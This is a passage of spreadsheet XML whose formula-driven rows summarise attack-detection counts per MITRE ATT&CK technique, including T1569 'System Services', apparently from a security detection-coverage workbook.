        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>267</v>
      </c>
      <c r="F61" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (267)</v>
      </c>
      <c r="G61" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1</v>
      </c>
      <c r="H61" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I61" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J61" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K61" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M61" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>5</v>
      </c>
      <c r="N61" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>1</v>
      </c>
      <c r="O61" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (5)</v>
      </c>
      <c r="P61" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q61" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S61" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>6</v>
      </c>
      <c r="T61" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>2</v>
      </c>
      <c r="U61" s="4" t="str">
        <f t="shared" si="2"/>
        <v>2 (6)</v>
      </c>
      <c r="V61" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W61" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>267</v>
      </c>
      <c r="Z61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>251</v>
      </c>
      <c r="AA61" s="322" t="str">
        <f t="shared" si="3"/>
        <v>251 (267)</v>
      </c>
      <c r="AB61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC61" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>125</v>
      </c>
      <c r="AE61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>23</v>
      </c>
      <c r="AF61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>9</v>
      </c>
      <c r="AG61" s="322" t="str">
        <f t="shared" si="4"/>
        <v>9 (23)</v>
      </c>
      <c r="AH61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>5</v>
      </c>
      <c r="AI61" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>3</v>
      </c>
      <c r="AK61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>290</v>
      </c>
      <c r="AL61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>260</v>
      </c>
      <c r="AM61" s="322" t="str">
        <f t="shared" si="5"/>
        <v>260 (290)</v>
      </c>
      <c r="AN61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>12</v>
      </c>
      <c r="AO61" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>127</v>
      </c>
      <c r="AQ61" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR61" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS61" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT61" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU61" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>20</v>
      </c>
      <c r="AX61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>4</v>
      </c>
      <c r="AY61" s="322" t="str">
        <f t="shared" si="7"/>
        <v>4 (20)</v>
      </c>
      <c r="AZ61" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>4</v>
      </c>
      <c r="BA61" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC61" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>26</v>
      </c>
      <c r="BD61" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>6</v>
      </c>
      <c r="BE61" s="4" t="str">
        <f t="shared" si="8"/>
        <v>6 (26)</v>
      </c>
      <c r="BF61" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>6</v>
      </c>
      <c r="BG61" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI61" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ61" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK61" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL61" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM61" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO61" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>389</v>
      </c>
      <c r="BP61" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>389</v>
      </c>
      <c r="BQ61" s="4" t="str">
        <f t="shared" si="10"/>
        <v>389 (389)</v>
      </c>
      <c r="BR61" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS61" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>6</v>
      </c>
      <c r="BT61" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU61" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>266</v>
      </c>
      <c r="BV61" s="292">
        <v>20</v>
      </c>
      <c r="BW61" s="322">
        <v>20</v>
      </c>
      <c r="BX61" s="4" t="str">
        <f t="shared" si="11"/>
        <v>20 (20)</v>
      </c>
      <c r="BY61" s="12">
        <v>2</v>
      </c>
      <c r="BZ61" s="13">
        <v>1</v>
      </c>
      <c r="CA61" s="394">
        <v>20</v>
      </c>
      <c r="CB61" s="288">
        <v>40</v>
      </c>
      <c r="CC61" s="4">
        <v>40</v>
      </c>
      <c r="CD61" s="4" t="str">
        <f t="shared" si="12"/>
        <v>40 (40)</v>
      </c>
      <c r="CE61" s="4">
        <v>2</v>
      </c>
      <c r="CF61" s="4">
        <v>1</v>
      </c>
      <c r="CG61" s="13">
        <v>1</v>
      </c>
      <c r="CH61" s="394">
        <v>20</v>
      </c>
    </row>
    <row r="62" spans="1:86" ht="15" customHeight="1">
      <c r="A62" s="4">
        <f t="shared" si="13"/>
        <v>60</v>
      </c>
      <c r="B62" s="4" t="str">
        <f>IFERROR(VLOOKUP(A62,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1569</v>
      </c>
      <c r="C62" s="493" t="str">
        <f>IFERROR(VLOOKUP(B62,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Services</v>
      </c>
      <c r="D62" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B62)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E62" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>17</v>
      </c>
      <c r="F62" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (17)</v>
      </c>
      <c r="G62" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>13</v>
      </c>
      <c r="H62" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I62" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (13)</v>
      </c>
      <c r="J62" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K62" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M62" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>14</v>
      </c>
      <c r="N62" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>4</v>
      </c>
      <c r="O62" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (14)</v>
      </c>
      <c r="P62" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>4</v>
      </c>
      <c r="Q62" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S62" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>27</v>
      </c>
      <c r="T62" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>6</v>
      </c>
      <c r="U62" s="4" t="str">
        <f t="shared" si="2"/>
        <v>6 (27)</v>
      </c>
      <c r="V62" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="W62" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>3</v>
      </c>
      <c r="Y62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>23</v>
      </c>
      <c r="Z62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>7</v>
      </c>
      <c r="AA62" s="322" t="str">
        <f t="shared" si="3"/>
        <v>7 (23)</v>
      </c>
      <c r="AB62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="AC62" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>4</v>
      </c>
      <c r="AE62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>40</v>
      </c>
      <c r="AF62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>30</v>
      </c>
      <c r="AG62" s="322" t="str">
        <f t="shared" si="4"/>
        <v>30 (40)</v>
      </c>
      <c r="AH62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>28</v>
      </c>
      <c r="AI62" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>5</v>
      </c>
      <c r="AK62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>63</v>
      </c>
      <c r="AL62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>37</v>
      </c>
      <c r="AM62" s="322" t="str">
        <f t="shared" si="5"/>
        <v>37 (63)</v>
      </c>
      <c r="AN62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>34</v>
      </c>
      <c r="AO62" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>6</v>
      </c>
      <c r="AQ62" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR62" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS62" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT62" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU62" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>2</v>
      </c>
      <c r="AX62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>2</v>
      </c>
      <c r="AY62" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (2)</v>
      </c>
      <c r="AZ62" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA62" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>2</v>
      </c>
      <c r="BC62" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>29</v>
      </c>
      <c r="BD62" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>8</v>
      </c>
      <c r="BE62" s="4" t="str">
        <f t="shared" si="8"/>
        <v>8 (29)</v>
      </c>
      <c r="BF62" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>7</v>
      </c>
      <c r="BG62" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>5</v>
      </c>
      <c r="BI62" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ62" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK62" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL62" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM62" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO62" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>15</v>
      </c>
      <c r="BP62" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>14</v>
      </c>
      <c r="BQ62" s="4" t="str">
        <f t="shared" si="10"/>
        <v>14 (15)</v>
      </c>
      <c r="BR62" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS62" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>9</v>
      </c>
      <c r="BT62" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU62" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>10</v>
      </c>
      <c r="BV62" s="292">
        <v>2</v>
      </c>
      <c r="BW62" s="322">
        <v>2</v>
      </c>
      <c r="BX62" s="4" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY62" s="12">
        <v>2</v>
      </c>
      <c r="BZ62" s="13">
        <v>1</v>
      </c>
      <c r="CA62" s="394">
        <v>1</v>
      </c>
      <c r="CB62" s="288">
        <v>4</v>
      </c>
      <c r="CC62" s="4">
        <v>4</v>
      </c>
      <c r="CD62" s="4" t="str">
        <f t="shared" si="12"/>
        <v>4 (4)</v>
      </c>
      <c r="CE62" s="4">
        <v>2</v>
      </c>
      <c r="CF62" s="4">
        <v>2</v>
      </c>
      <c r="CG62" s="13">
        <v>1</v>
      </c>
      <c r="CH62" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:86" ht="15" customHeight="1">
      <c r="A63" s="4">
